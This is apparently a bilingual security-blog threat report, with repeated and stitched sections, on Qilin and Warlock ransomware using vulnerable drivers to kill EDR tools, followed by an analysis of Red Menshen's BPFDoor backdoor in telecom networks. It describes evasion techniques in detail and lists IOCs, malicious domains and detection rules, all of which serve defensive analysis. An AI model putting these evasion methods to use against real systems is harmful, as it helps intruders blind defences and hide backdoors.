Kill Chain & Attack Flow

Giai đoạn 1: Initial Access

Qilin: Chiếm quyền qua lỗ hổng trên dịch vụ internet-facing, phishing hoặc credential nộp trên web đen.

Warlock: Khai thác vào lỗ hổng chưa vá trên các dịch vụ Microsoft SharePoint.

Giai đoạn 2: Execution & Persistence

Qilin: Dùng FoxitPDFReader.exe hợp lệ để nhúng (side-load) một DLL độc hại msimg32.dll.

Warlock: Thả Web Shell để mở cổng C2 và dùng công cụ TightVNC được ngụy trang thành một Windows Service mặc định để bám trụ mạng.

Giai đoạn 3: Defense Evasion & Credential Access

Qilin: Cắt đứt luồng giám sát Event Tracing for Windows (ETW), áp dụng cơ chế Halo's Gate để bypass các API syscall hook, sau đó thả kernel driver hlpdrv.sys để tắt luôn EDR.

Warlock: Cấy NSecKrnl.sys chạy tự do ngầm dưới kernel nhằm đóng băng EDR, sau đó triển khai Rclone ngụy trang dưới các file Security giả mạo (TrendSecurity.exe) nhằm đẩy dữ liệu ra ngỏ hậu.

Giai đoạn 4: Impact (Ransomware Execution)

Qilin mã hóa các file theo tiêu chuẩn mở. Trái lại, Warlock cấu hình mã hóa đồng loạt trên diện rộng qua Active Directory GPO, đẩy payloads xuống các folder SYSVOL / NETLOGON và ép máy nạn nhân chạy khi reboot. File bị khóa có đuôi .x2anylock.

Phân tích kỹ thuật chi tiết

Sự thay đổi cốt lõi trong các chiến dịch mới này là chuỗi EDR Killer ở cấp Kernel.

Cơ chế bypass In-Memory của Qilin: Khác với các phương thức dừng tiến trình thô bạo (dễ bị phát hiện), Qilin sử dụng một chuỗi nạp DLL (msimg32.dll) tinh chỉnh cực kỳ phức tạp. Tính chất nguy hiểm nhất là toàn bộ chuỗi này thi triển trên bộ nhớ RAM (In-Memory) nhằm qua mặt mọi máy quét ổ cứng, diễn ra lần lượt theo 4 chặng:

Chặng 1 — Chiếm quyền ưu tiên nạp DLL (Search Order Hijacking): Kẻ tấn công thả một file msimg32.dll giả mạo nằm cùng thư mục với phần mềm đọc PDF hợp lệ (ví dụ: FoxitPDFReader.exe). Khi quản trị viên hoặc hệ thống chạy phần mềm PDF, Windows vô tình bị lừa nạp luôn file DLL giả mạo thay vì file gốc của hệ điều hành. Để tránh gây nghi ngờ vì crash phần mềm, DLL độc hại sẽ âm thầm "chuyển tiếp" (forward) mọi phản hồi hợp pháp về lại file msimg32.dll hàng "xịn" đang ngự ở C:\Windows\System32\.

Chặng 2 — Giải mã và lẩn trốn trên RAM (Multi-Stage In-Memory Loader): Tiếp theo, đoạn mã độc tự giải nén chính nó qua ba tiến trình liên tiếp trên bộ nhớ tạm (không hề chạm đĩa). Để đối phó với các cơ chế phòng thủ tân tiến, chúng triển khai một rào chắn hoàn hảo: Tắt hệ thống ghi log mặc định của Windows (ETW suppression) để bách độc tín hiệu, dùng phương thức "Halo's Gate" nhằm luồn lách qua các móc chặn kiểm tra (syscall hooks) của hệ điều hành, đồng thời ngụy trang rối rắm luồng thực thi (thông qua SEH/VEH obfuscation) làm nản lòng bất kì chuyên gia đảo ngược vi mã (Reverse Engineer) nào đổ mồ hôi phân tích rác RAM.

Chặng 3 — Hạ thổ vũ khí diệt EDR (BYOVD Deployment): Chỉ khi các lá chắn ẩn danh đã giăng kín, khối payload trên RAM mới lẳng lặng thả đúng 2 file driver xuống thư mục bộ nhớ rác %TEMP%. File đầu tiên là rwdrv.sys – vỏ bọc của driver ThrottleStop.sys (được cấp chữ ký tin cậy từ tập đoàn bên thứ 3 nhưng mang lỗi nghiêm trọng về quản lý quyền), cho phép ứng dụng đọc/ghi thẳng vào cấu trúc cấu hình gốc của CPU. File thứ hai là hlpdrv.sys, sẽ "ké" quyền cấm lách đạo từ file thứ nhất để ra thẳng lệnh truy sát tiến trình tự vệ trên các ứng dụng bảo mật.

Chặng 4 — "Thảm sát" EDR trong im lặng: Qilin không kill EDR một cách lộ liễu. Trước khi ra tay rút ống thở, driver độc hại dùng quyền hạn chiếm được lẳng lặng tháo sạch mọi "camera an ninh" (EDR monitoring callbacks) mà phần mềm bảo vệ đã cắm vào lõi HĐH. Tiến trình EDR bị mù từ bên trong và tắt lịm, hoàn toàn không đẩy kịp bất kì cảnh báo sập nguồn nào về cho máy chủ trung tâm (SOC). Khi khiên bảo vệ triệt để tan biến, ransomware bắt đầu cuộc thảm sát mã hoá tập tin.

Cơ chế BYOVD của Warlock: Ở một mặt trận khác, thay vì dùng driver cũ googleApiUtil64.sys như đầu năm, Warlock nay đã chuyển qua sử dụng bản nâng cấp NSecKrnl.sys. Chiến thuật đánh lừa EDR kết hợp thao tác ẩn thân qua việc đổi tên trực tiếp file độc hại thành "TrendFileSecurityCheck.exe". Đây là nghệ thuật hòa mình vào môi trường giả tạo (Ngụy trang thành quy trình quét hợp lệ của phần mềm Trend Micro) khiến phần mềm phân tích tín hiệu dễ làm ngơ với luồng dữ liệu đánh tráo.

IOCs

Các file độc hại (Hash SHA-256)

7787da25451f5538766240f4a8a2846d0a589c59391e15f188aa077e8b888497

16f83f056177c4ec24c7e99d01ca9d9d6713bd0497eeedb777a3ffefa99c97f0

bd1f381e5a3db22e88776b7873d4d2835e9a1ec620571d2b1da0c58f81c84a56

Network Indicators (C2)

198[.]13[.]158[.]193

MITRE ATT&CK Mapping

TA0001 - Initial Access: T1190 (Exploit Public-Facing Application) - Nhắm vào SharePoint.

TA0002 - Execution: T1569.002 (Service Execution) - Khởi chạy Windows Services.

TA0003 - Persistence: T1543.003 (Windows Service) - TightVNC cài qua PsExec.

TA0005 - Defense Evasion: T1574.002 (DLL Side-Loading), T1068 (Exploitation for Privilege Escalation - BYOVD), T1562.001 (Disable or Modify Tools - Tắt EDR driver).

TA0011 - Command and Control: T1090.003 (Multi-hop Proxy) - Dùng SOCKS5 Yuze, VS Code tunnel, Cloudflare Tunnel.

Nhận định chuyên gia

Những cuộc tấn công trên phá vỡ niềm tin sai lầm rằng: Chỉ cần có một sản phẩm EDR đắt tiền là đủ để bảo vệ Endpoint. Bằng việc tận dụng một file driver (như ThrottleStop) vô hại nhưng chứa lỗi thiết kế quyền Memory (mở đường cho BYOVD), mã độc RaaS hiện tại tự động khóa chặt cả một EDR pipeline trong tích tắc mà trung tâm SOC thậm chí không nhận được một log sự cố nào.

Chỉ số 6 đến 15 ngày dwell time trong chiến dịch này cho thấy lỗ hổng cực kì lớn về mặt "Pre-Ransomware Detection". Nếu SOC team không có khả năng phát hiện các hành vi bất thường, giả dụ như các lệnh net user /add chạy liên tục vào lúc rạng sáng, RaaS group sẽ coi những đặc quyền này như bãi thử tự do cho việc thả lỏng chuỗi DLL injection. Hơn thế nữa, RaaS đã chính thức kéo ngang năng lực kỹ thuật của một cuộc tấn công tống tiền so với các cuộc tấn công cấp quốc gia.

Khuyến nghị

Immediate (Tức thời 0-24h)

• Bật ngay tính năng Hypervisor-Protected Code Integrity (HVCI - Memory Integrity) trên tất cả Endpoint chạy Windows (nằm trong Windows Security > Device Security > Core Isolation). HVCI là chốt chặn quan trọng nhất ép ngừng việc nhúng file rwdrv.sys hoặc NSecKrnl.sys.

• Triển khai Windows Defender Application Control (WDAC) import danh sách theo chuẩn Microsoft Vulnerable Driver Blocklist.

Short-term (1-7 ngày)

• Xây dựng luật cảnh báo nội bộ (EDR/SIEM/Sysmon): Đánh dấu bất kì quá trình gọi file msimg32.dll nào mà nằm ngoài thư mục C:\Windows\System32. Cổng side-loading thường diễn ra qua FoxitPDFReader.exe hoac 7-Zip.

• Kích hoạt luật cảnh báo khi một service hệ thống mới được cài đặt (Event ID 7045) hoặc có báo lỗi tải driver (Event ID 219) liên quan các vùng %TEMP%, SYSVOL. Cụ thể: Khai báo Sysmon quét các Event ID 6 (DriverLoad).

Long-term

• Quản lý siêu chặt chẽ hạ tầng Group Policy. Kịch bản tống tiền qua AD của Warlock phụ thuộc hoàn toàn vào quá trình ghi payload vào thư mục SYSVOL để ép Domain Controller cài đè ransomware cho các nhánh client con. Chuyển đổi mô hình thành Tiered administration để thu hẹp phạm vi tổn thất (blast radius) trong môi trường bị bẻ khóa.

• Quán triệt việc vá lỗi ứng dụng Web, đặc biệt ngay trên Microsoft SharePoint.

Tham khảo

Qilin and Warlock Ransomware Use Vulnerable Drivers to Disable 300+ EDR Tools

An overview of ransomware threats in Japan in 2025 and early detection insights from Qilin cases

BYOVD Ransomware Attacks Now Capable of Defeating Every Major EDR Product

Qilin Ransomware Uses Malicious DLL to Disable Nearly All EDR Solutions

Two notorious Ransomware-as-a-Service (RaaS) groups, Qilin and Warlock (also known as Water Manual), are independently deploying the "Bring Your Own Vulnerable Driver" (BYOVD) technique at the Kernel level. Their goal is to proactively "kill" Endpoint Detection and Response (EDR) processes before releasing the encryption payload. Research confirms these toolkits can disable over 300 EDR drivers from nearly all major security vendors in the market today. The alarming level of the Qilin campaign is demonstrated by real data: In 2025, ransomware incidents in Japan increased by 17.5%, with Qilin accounting for the largest share at 16.4% of total infections, heavily targeting the manufacturing and automotive sectors. The weaponization of BYOVD, once the privilege of Nation-State APT groups, has now been commercialized for financial interest groups.

The most urgent action for every organization: Immediately enable Hypervisor-protected Code Integrity (HVCI - Memory Integrity) and promptly update the Microsoft Vulnerable Driver Blocklist across all Windows partitions.

Hacker Group Profile

Behind this large-scale BYOVD campaign are two independent underground organizations with formidable capabilities: Qilin Group: A RaaS (Ransomware-as-a-Service) gang suspected to be based in the Post-Soviet region. The clearest evidence is their EDR Killer module, which integrates "Geo-fencing" to prevent malware activation on systems using languages from this region, helping them evade local sanctions. Currently, Qilin has become the most notorious malware operator, with a significant increase in ransomware victims, notably causing the largest share of attacks in Japan in the first half of 2025. Warlock Group (or Water Manual): A RaaS gang that exploits a ransomware branch derived from LockBit (distributing encryption payloads with the .x2anylock extension). Warlock's distinctive behavior involves exploiting delays in Microsoft SharePoint server patching by administrators and patiently "lying in wait" for up to 15 days to fully capture Domain Controller configurations before launching widespread encryption attacks via GPO.

Preliminary Timeline

Pre-launch: Qilin extracts stolen credentials on the Darknet or Breach Forums. Warlock exploits unpatched public Microsoft SharePoint servers.

Dwell Time: From the start of infiltration to encryption deployment, Qilin takes an average of about 6 days. Meanwhile, the Warlock group is willing to lie in wait for up to 15 days to extract data and set up GPO scenarios before attacking.

Execution: Launch BYOVD driver to disable EDR, encrypt, and establish a double extortion model.

Kill Chain & Attack Flow

Stage 1: Initial Access

Qilin: Gains access through vulnerabilities in internet-facing services, phishing, or credentials submitted on the dark web. Warlock: Exploits unpatched vulnerabilities in Microsoft SharePoint services.

Stage 2: Execution & Persistence

Qilin: Uses the legitimate FoxitPDFReader.exe to side-load a malicious DLL, msimg32.dll. Warlock: Deploys a web shell to open a C2 channel and uses the TightVNC tool disguised as a default Windows Service to maintain network persistence.

Stage 3: Defense Evasion & Credential Access

Qilin: Disrupts Event Tracing for Windows (ETW) monitoring, applies Halo's Gate mechanism to bypass API syscall hooks, then drops the kernel driver hlpdrv.sys to disable EDR. Warlock: Injects NSecKrnl.sys to run covertly under the kernel to freeze EDR, then deploys Rclone disguised as fake security files (TrendSecurity.exe) to exfiltrate data through a backdoor.

Stage 4: Impact (Ransomware Execution)

Qilin encrypts files using open standards. In contrast, Warlock configures widespread encryption through Active Directory GPO, deploying payloads to SYSVOL/NETLOGON folders and forcing victim machines to execute them upon reboot. Locked files have the extension .x2anylock.

Detailed technical analysis

The core change in these new campaigns is the Kernel-level EDR Killer sequence.

Qilin's In-Memory bypass mechanism: Unlike crude process-stopping methods (easily detected), Qilin uses a highly complex DLL loading chain (msimg32.dll). The most dangerous aspect is that this entire sequence is executed in RAM (In-Memory) to evade all hard drive scanners, proceeding in four stages:

Stage 1 — DLL Search Order Hijacking: The attacker drops a fake msimg32.dll file in the same directory as the legitimate PDF reader software (e.g., FoxitPDFReader.exe). When an administrator or the system runs the PDF software, Windows is tricked into loading the fake DLL instead of the original system file. To avoid suspicion from software crashes, the malicious DLL silently forwards all legitimate responses back to the genuine msimg32.dll file located in C:\Windows\System32\.

Stage 2 — Decryption and Evasion in RAM (Multi-Stage In-Memory Loader): Next, the malware self-extracts through three consecutive processes in temporary memory (without touching the disk). To counter advanced defense mechanisms, it deploys a perfect shield: Disabling Windows' default logging system (ETW suppression) to block signals, using the "Halo's Gate" method to bypass operating system syscall hooks, and intricately disguising the execution flow (through SEH/VEH obfuscation) to frustrate any reverse engineer sweating over RAM garbage analysis. Stage 3 — Deploying EDR Killer (BYOVD Deployment): Only when the anonymous shields are fully deployed does the payload in RAM quietly drop exactly two driver files into the %TEMP% directory. The first file is rwdrv.sys — a wrapper for the ThrottleStop.sys driver (trusted third-party signed but with severe privilege management flaws), allowing the application to read/write directly to the CPU's original configuration structure. The second file is hlpdrv.sys, which "borrows" elevated privileges from the first file to directly execute termination commands on self-defense processes in security applications.

Stage 4 — Silent EDR "Massacre": Qilin doesn't kill EDR overtly. Before pulling the plug, the malicious driver quietly removes all "security cameras" (EDR monitoring callbacks) embedded in the OS core by security software. The EDR process becomes blind from within and shuts down, unable to send any shutdown alerts to the central server (SOC). Once the protective shield completely vanishes, the ransomware begins its file encryption massacre.

Warlock's BYOVD Mechanism: On another front, instead of using the old driver googleApiUtil64.sys like earlier this year, Warlock has now switched to the upgraded NSecKrnl.sys. The strategy to deceive EDR involves stealth tactics by directly renaming the malicious file to "TrendFileSecurityCheck.exe." This art of blending into a fabricated environment (disguising as a legitimate scanning process of Trend Micro software) makes it easier for signal analysis software to overlook the tampered data flow.

IOCs

Malicious files (SHA-256 Hash)

7787da25451f5538766240f4a8a2846d0a589c59391e15f188aa077e8b888497

16f83f056177c4ec24c7e99d01ca9d9d6713bd0497eeedb777a3ffefa99c97f0

bd1f381e5a3db22e88776b7873d4d2835e9a1ec620571d2b1da0c58f81c84a56

Network Indicators (C2)

198[.]13[.]158[.]193

MITRE ATT&CK Mapping

TA0001 - Initial Access: T1190 (Exploit Public-Facing Application) - Targeting SharePoint. TA0002 - Execution: T1569.002 (Service Execution) - Launch Windows Services. TA0003 - Persistence: T1543.003 (Windows Service) - TightVNC installed via PsExec. TA0005 - Defense Evasion: T1574.002 (DLL Side-Loading), T1068 (Exploitation for Privilege Escalation - BYOVD), T1562.001 (Disable or Modify Tools - Disable EDR driver). TA0011 - Command and Control: T1090.003 (Multi-hop Proxy) - Using SOCKS5 Yuze, VS Code tunnel, Cloudflare Tunnel.

Expert opinion

These attacks shatter the false belief that having an expensive EDR product is enough to protect an endpoint. By exploiting a harmless driver file (like ThrottleStop) with a design flaw in memory permissions (paving the way for BYOVD), current RaaS malware can instantly lock down an entire EDR pipeline without the SOC center receiving any incident logs. A dwell time of 6 to 15 days in this campaign highlights a significant vulnerability in "Pre-Ransomware Detection." If the SOC team cannot detect unusual behaviors, such as continuous net user /add commands running in the early morning, the RaaS group will treat these privileges as a free testing ground for DLL injection chains. Furthermore, RaaS has officially elevated the technical capability of a ransomware attack to the level of nation-state attacks.

Recommendation

Immediate (0-24 hours)

• Immediately enable Hypervisor-Protected Code Integrity (HVCI - Memory Integrity) on all Windows endpoints (located in Windows Security > Device Security > Core Isolation). HVCI is the most crucial barrier to stop the embedding of rwdrv.sys or NSecKrnl.sys files.

• Deploy Windows Defender Application Control (WDAC) and import the Microsoft Vulnerable Driver Blocklist.

Short-term (1-7 days)

• Create internal alert rules (EDR/SIEM/Sysmon): Flag any process calling the msimg32.dll file that is outside the C:\Windows\System32 directory. Side-loading often occurs through FoxitPDFReader.exe or 7-Zip.

• Activate alert rules when a new system service is installed (Event ID 7045) or there is a driver load error (Event ID 219) related to the %TEMP%, SYSVOL areas. Specifically, configure Sysmon to scan for Event ID 6 (DriverLoad).

Long-term

• Strictly manage Group Policy infrastructure. Warlock's AD ransomware scenario relies entirely on writing payloads to the SYSVOL directory to force the Domain Controller to overwrite ransomware onto client branches. Transition to a Tiered administration model to reduce the blast radius in a compromised environment.

• Ensure prompt patching of web applications, particularly on Microsoft SharePoint.

Refer to

Qilin and Warlock Ransomware Use Vulnerable Drivers to Disable 300+ EDR Tools

An overview of ransomware threats in Japan in 2025 and early detection insights from Qilin cases

BYOVD Ransomware Attacks Now Capable of Defeating Every Major EDR Product

Qilin Ransomware Uses Malicious DLL to Disable Nearly All EDR Solutions

In the modern world of cybersecurity, most defense mechanisms are built on a familiar assumption: every threat will leave a trace — a suspicious connection, an open port, or at least an unusual behavior in the system. The APT Red Menshen group is covertly deploying seven entirely new BPFDoor variants to manipulate the core infrastructure of telecommunications providers. Based on an analysis of nearly 300 of the latest malware samples from Rapid7, this campaign has bypassed traditional EDR defenses by using Berkeley Packet Filters (BPFs) at the Kernel level, creating an invisible "trapdoor" architecture that activates only with a magic packet through stateless protocols.

Red Menshen - the APT group behind BPFDoor

Introduction

Red Menshen is a sophisticated cyber attack group (APT – Advanced Persistent Threat) known for using the BPFDoor backdoor in espionage campaigns spanning several years, specifically targeting telecommunications infrastructure and critical systems. Unlike many other noisy APT groups, Red Menshen operates with the philosophy: "Stay invisible, stay persistent." Simply put, this means causing no destruction, creating no noise, and quietly maintaining access over a long period.

Scope of operations

Red Menshen is noted for operating globally, with primary targets including telecom providers, internet infrastructure, enterprise Linux servers, and core network systems. The reason the hackers target telecom is simply to access call metadata, monitor user traffic, and serve strategic espionage goals.

Prominent attack techniques

Implant into router firmware Use custom backdoor Living-off-the-land Supply chain attack (possible)

Detailed techniques

How has BPFDoor "evolved"?

Initially, BPFDoor was a fairly simple rootkit temporarily running in the /dev/shm directory, leaving no files on the disk and erasing traces after operation. This made it hard to detect, but its main weakness was that modern security systems could identify "strange" processes running from memory. After some upgrades, new variants changed their strategy: storing the malware directly on disk, masquerading as system processes (e.g., server management daemons) to make it appear legitimate and less suspicious. Simply put: shifting from "temporary concealment" to "long-term concealment and self-legitimization."

Command and Control (C2) architecture

The Red Menshen group uses two main methods to control BPFDoor: httpShell, which hides in web traffic, and icmpShell, which hides in ping (ICMP).

httpShell – Hidden in HTTP traffic

BPFDoor will monitor all network traffic, not at the application level but deep in the kernel. This means it sees packets before the firewall or antivirus.

In reality, the Internet has multiple layers (tunnels) such as GRE or GTP (in telecommunications networks). httpShell can "unwrap" these layers directly in the kernel to see the data inside. It's like opening an envelope, then opening another envelope inside, until the real content is revealed.

httpShell has another ability to evade firewalls and WAFs. Normally, firewalls/WAFs check the data position in a packet. BPFDoor uses a clever trick by adding padding (fake data) and forcing the identifier "9999" to always be at the 26th byte. As a result, even if the packet is altered by a proxy, the malware still finds the correct "signal" to exploit.

icmpShell – Control via ping

This variant, instead of using HTTP, will use ICMP (ping) to communicate and create a two-way control shell, which is often extremely dangerous because ICMP is usually not blocked.

This dangerous variant also uses the "PID mutation" technique. This means each time the malware runs, it has a different PID (Process ID). BPFDoor exploits this by attaching logic to the PID, causing its "signature" to change with each run. As a result, the firewall cannot write a fixed rule to block it.

Another point is the extremely clever way this variant operates. Typically, malware requires a fixed C2 server (IP/domain), but BPFDoor does not. When an attacker sends a packet, the malware doesn't need to know the IP in advance; instead, it just reads the source IP of the packet and then makes a reverse connection. Simply put, the attacker can control it from anywhere without needing a fixed infrastructure.

In cases where the malware cannot connect, it turns the infected machine into a relay, sending ICMP to another machine on the internal network. This is even more dangerous as it allows the variant to penetrate deeper into the system like a secret router.

What makes BPFDoor dangerous?

Operates in the kernel, almost "invisible" to antivirus. No need for a fixed C2, making it impossible to block by IP/domain. Uses a legitimate protocol, but inside is a secret control channel.

• HTTP → normal

• ICMP → normal

• NTP → normal

Constant changes with a non-fixed signature make it very difficult to detect using rules.

Expert assessment & conclusion

The logical shift of the BPF filter from initializing SOCK_RAW sockets to SOCK_DGRAM provides a clear view of Red Menshen's objectives. The group is actively streamlining the process of dissecting virtual packets, leaving the task of unraveling complex telecommunications layers (like IPsec and GRE node setups) to the target server's kernel. Typically, telecommunications control servers maintain a heavy multi-layered network array; this adjustment allows BPFDoor to eliminate bulky decoding libraries, reducing the infection footprint and the risk of crashing the core processes of the national network system.

Additionally, the malware's precise identification of the disguise process in the format of HPE Insight Management (cmathreshd) with the specific command -p 5 -s OK for deployment into the Bare-Metal hardware of HPE ProLiant demonstrates that this APT campaign has a deep understanding of the infrastructure architecture that the victim—especially the 4G/5G core clusters of Ericsson—is operating.

The variant's direct trace of hidden system files into the directory /var/run/user/0 instead of using the chmod script allows the attacker to avoid modifying execution permissions recorded in the auditd log file. This is a highly sophisticated technique that undermines the logic of detecting malicious files in current host-monitoring EDR platforms in Vietnam.

Recommendation

Immediate (0-24h)

• Conduct a network infrastructure scan for ICMP packet connections with Sequence Number = 1234 and an invalid ICMP Code 1. These are beaconing heartbeats revealing the variant's blind spot.

• Check the process list on Linux servers, focusing on direct execution of root mask processes like zabbix_agentd, dockerd, or cmathreshd without practical mapping to /bin or software installation directories. Administrators are encouraged to immediately run the script rapid7_bpfdoor_check.sh to capture filter logic pinned to AF_PACKET packets.

Short-term (1-7 days)

• Immediately block and review connections to the following DNS endpoints: ntpussl.instanthq.com, ntpupdate.ddnsgeek.com, ntpd.casacam.net, ntpupdate.ygto.com.

• Change the rule detection model to depend on payload, applying structural identification indicators. Update the Suricata rule to match byte-level from BPF backdoor like: udp[8:2] == 0x3182 or (icmp[8:2] == 0x1051 and icmp[icmptype] == icmp-echo)

Long-term

• Add monitoring rules to the auditd system module to closely track all socket creation operations under the AF_PACKET label, specifically targeting the setsockopt command used to attach BPF filter strings to the kernel.

• Restructure the privilege mechanism for running services as root on physical telecom core clusters. Deeply implement the File Integrity Monitoring (FIM) system to immediately patch the spread paths in temporary /run directories.

MITRE ATT&CK Mapping

IOCs

BPFDoor Controller

6227cb77cb4ab1d066eebf14e825dbc0a0a7f1e9 64171d46c8290c5cd88e0fbce9e23dcecbe20865 65e4d507b1de3a1e4820e4c81808fdfd7e238e10 9bb8977cd5fc7be484286be8124154ab8a608d96

BPFDoor Malware

02aebc3762e766be0ac24ef57a135398344a8f7e 04aa241c574f0a7ec93ba5d27807d8e78467f21e 16f94f0df6003f1566b2108f55e247f60a316185 1db21dbf41de5de3686195b839e74dc56d542974 28765121730d419e8656fb8d618b2068408fe5ae 291af8adf6fa078692d0bf5e0d9d00c376bb3fff 316ac8215095a24429632849407311b18a16e0cf 351febd645c66a3c9a79253d0aefcce8ff77054c 3771319be1c8883610c65977811e93b0bdaddf6f 4181bc848a1cd32911a83e02feac9b8abbd69ae2 43b4dbc71ada99a7b8a8d6d0490ba5526a34f9a0 4b1ea5e7b28eb110d8741b76d34f7dbae6f13b79 4c89beab00e3119cf516d6f98d364a5d99232181 5ddcbe4b591293f7b34fc0ef65db6248bcc67eb6 64171d46c8290c5cd88e0fbce9e23dcecbe20865 7ab39d7aad49abb0f626383ed776fe20a3b4c8f3 88075bbc34655d1fa2a750f3bbdee38214974009 8b5844fcbf6af23bc0b410fc180e7e6bdd4f35c7 8ebe1a71af1061d9e943bdff46c5ed954d8c9348 937f6068df4e091cf92d50afb3c6b7cad1de6230 9bdea37835cdb7f0b291891386af28184ac85f79 a6b66b8b7eae2969fd7237888d30766baa1b2274 be47b0c2fb328a338874f6efbe8305ddb74f6a48 c38fc109e31c9d67a1efc6cb767f826b7e46fb19 c54e214810ca7042d013845076b0360bdd7132b2 c83651d7706efa8c115f2a0edb07f863f4e79ce5 d53b7d0030a095a3ffa4b67d13de82d08adda248 d61bf187c4cd3f9953b567b3ad320b9ecde1c347 d9037e0de902e6f7b6c5f1b3269ba482f5e67c8a dc94eaa39e11f2ca7739d2cfded9eec1967f33ee dd8db29e90c6b52ee3d2723cc168cf33ee0bb521 e17ddb6515f2d399552245191f98458b68fece7b ef03b84048193a158ecf1f7033ab0cc8869dd2a5 f61589b1f86d8692964a6bd3e96ddadbe22994eb fb488cdfd2e475f0d5cbecfe11e9bab2241f9d50

Reference

New Whitepaper: Stealthy BPFDoor Variants are a Needle That Looks Like Hay

China-Linked Red Menshen Uses Stealthy BPFDoor Implants to Spy via Telecom Networks

Chinese Hackers Caught Deep Within Telecom Backbone Infrastructure - SecurityWeek

BPFDoors Hidden Controller Used Against Asia, Middle East Targets | Trend Micro (US)

Trong thế giới an ninh mạng hiện đại, phần lớn các cơ chế phòng thủ đều được xây dựng dựa trên một giả định quen thuộc: mọi mối đe dọa đều sẽ để lại dấu vết — một kết nối đáng ngờ, một port mở, hay ít nhất là một hành vi bất thường trong hệ thống.

Nhóm APT Red Menshen đang ngấm ngầm triển khai 7 biến thể BPFDoor hoàn toàn mới để thao túng hạ tầng lõi của các nhà mạng viễn thông. Dựa trên phân tích gần 300 mẫu mã độc mới nhất từ Rapid7, chiến dịch này đã vượt qua các lớp phòng thủ EDR truyền thống bằng cách sử dụng công nghệ Berkeley Packet Filters (BPFs) ở cấp độ Kernel, tạo ra một kiến trúc "trapdoor" tàng hình chỉ kích hoạt bằng magic packet thông qua các giao thức phi trạng thái.

Red Menshen – Nhóm APT đứng sau BPFDoor

Giới thiệu

Red Menshen là một nhóm tấn công mạng tinh vi (APT – Advanced Persistent Threat) được biết đến với việc sử dụng backdoor BPFDoor trong các chiến dịch gián điệp kéo dài nhiều năm, đặc biệt nhắm vào hạ tầng viễn thông và các hệ thống trọng yếu.

Không giống nhiều nhóm APT ồn ào khác, Red Menshen hoạt động với triết lý: “Stay invisible, stay persistent.” Hiểu một cách đơn giản tức là không gây phá hoại, không tạo noise và chỉ âm thầm duy trì quyền truy cập trong thời gian dài

Phạm vi hoạt động

Red Menshen được ghi nhận hoạt động trên phạm vi toàn cầu, với các mục tiêu chính: Telecom providers (nhà mạng), Internet infrastructure, Enterprise Linux servers, Core network systems.

Lý do mà nhóm tin tặc nhắm vào telecom chỉ đơn giản là truy cập metadata cuộc gọi, theo dõi lưu lượng người dùng và phục vụ mục tiêu gián điệp chiến lược.

Kỹ thuật tấn công nổi bật

Implant vào firmware router

Sử dụng backdoor tùy biến

Living-off-the-land

Tấn công chuỗi cung ứng (có khả năng)

Kỹ thuật chi tiết

BPFDoor đã “tiến hóa” như thế nào?

Ban đầu, BPFDoor chỉ là một dạng rootkit khá đơn giản được chạy tạm trong thư mục /dev/shm, không lưu file trên ổ đĩa và tự xóa dấu vết sau khi hoạt động. Điều này giúp nó khó bị phát hiện, nhưng cũng có điểm yếu chính là các hệ thống bảo mật hiện đại có thể phát hiện process “lạ” chạy từ memory.

Sau một thời gian nâng cấp , các biến thể mới đã thay đổi chiến lược: Lưu trực tiếp malware xuống ổ đĩa (on-disk), giả mạo tiến trình hệ thống (ví dụ: daemon quản lý server) như này sẽ khiến nó trông giống phần mềm hợp lệ và khó bị nghi ngờ. Nói đơn giản: Từ “ẩn tạm thời” chuyển sang “ẩn lâu dài và hợp pháp hóa bản thân”.

Kiến trúc điều khiển (C2)

Nhóm Red Menshen sử dụng 2 cách chính để điều khiển BPFDoor: httpShell → ẩn trong traffic web và icmpShell → ẩn trong ping (ICMP).

httpShell – Ẩn trong traffic HTTP

BPFDoor sẽ thực hiện theo dõi toàn bộ traffic mạng nhưng không ở mức ứng dụng mà ở kernel (rất sâu). Nghĩa là nó thấy packet trước cả firewall hoặc antivirus.

Trong thực tế thì Internet thực tế có nhiều lớp (tunnel) như: GRE hoặc GTP (trong mạng viễn thông). httpShell có thể: “bóc” các lớp này ngay trong kernel và nhìn thấy dữ liệu bên trong. Giống như việc mở phong bì → rồi mở tiếp phong bì bên trong → cho đến khi thấy nội dung thật.

httpShell còn một khả năng là né firewall & WAF, bình thường firewall/WAF sẽ kiểm tra vị trí dữ liệu trong packet. BPFDoor làm một trick rất thông minh chính là thêm padding (dữ liệu giả) cũng như ép đoạn nhận diện "9999" luôn nằm ở byte thứ 26. Kết quả để lại sẽ là dù packet bị thay đổi bởi proxy những malware vẫn tìm đúng “tín hiệu” để khai thác.

icmpShell – Điều khiển qua ping

Biến thể này thay vì dùng HTTP nó sẽ thực hiện ICMP (ping) để giao tiếp và tạo một shell điều khiển hai chiều, điều này thường cực kỳ nguy hiểm bởi do ICMP thường không bị chặn.

Biến thể nguy hiểm này còn sử dụng kỹ thuật “biến đổi theo PID”. Tức là mỗi lần malware chạy thì nó có một PID (Process ID) khác nhau. BPFDoor lợi dụng điều này để gắn logic vào PID sau đó làm cho “signature” của nó thay đổi theo mỗi lần chạy. Hệ quả là firewall không thể viết rule cố định để chặn.

Một điểm nữa là cách hoạt động của biến thể này cũng vô cùng thông minh, thông thường malware cần server C2 cố định (IP/domain) nhưng BPFDoor thì không. Khi attacker gửi packet, malware không cần biết trước IP mà thay vào đó nó chỉ cần đọc source IP của packet sau đó thực hiện kết nối ngược lại. Hiểu đơn giản là attacker có thể điều khiển từ bất kỳ đâu mà không cần hạ tầng cố định.

Trong trường hợp mà không thể kết nối malware biến máy bị nhiễm thành relay, gửi ICMP sang máy khác trong mạng nội bộ. Điều này còn nguy hiểm hơn giúp biến thể lan sâu hơn vào hệ thống giống như một router bí mật.

Điều gì làm BPFDoor nguy hiểm?

Hoạt động ở kernel gần như “vô hình” với antivirus.

Không cần C2 cố định chính vì thế mà không thể block bằng IP/domain.

Dùng giao thức hợp lệ nhưng bên trong lại là kênh điều khiển bí mật.

• HTTP → bình thường

• ICMP → bình thường

• NTP → bình thường

Thay đổi liên tục với signature không cố định cũng như rất khó detect bằng rule.

Nhận định chuyên gia & kết luận

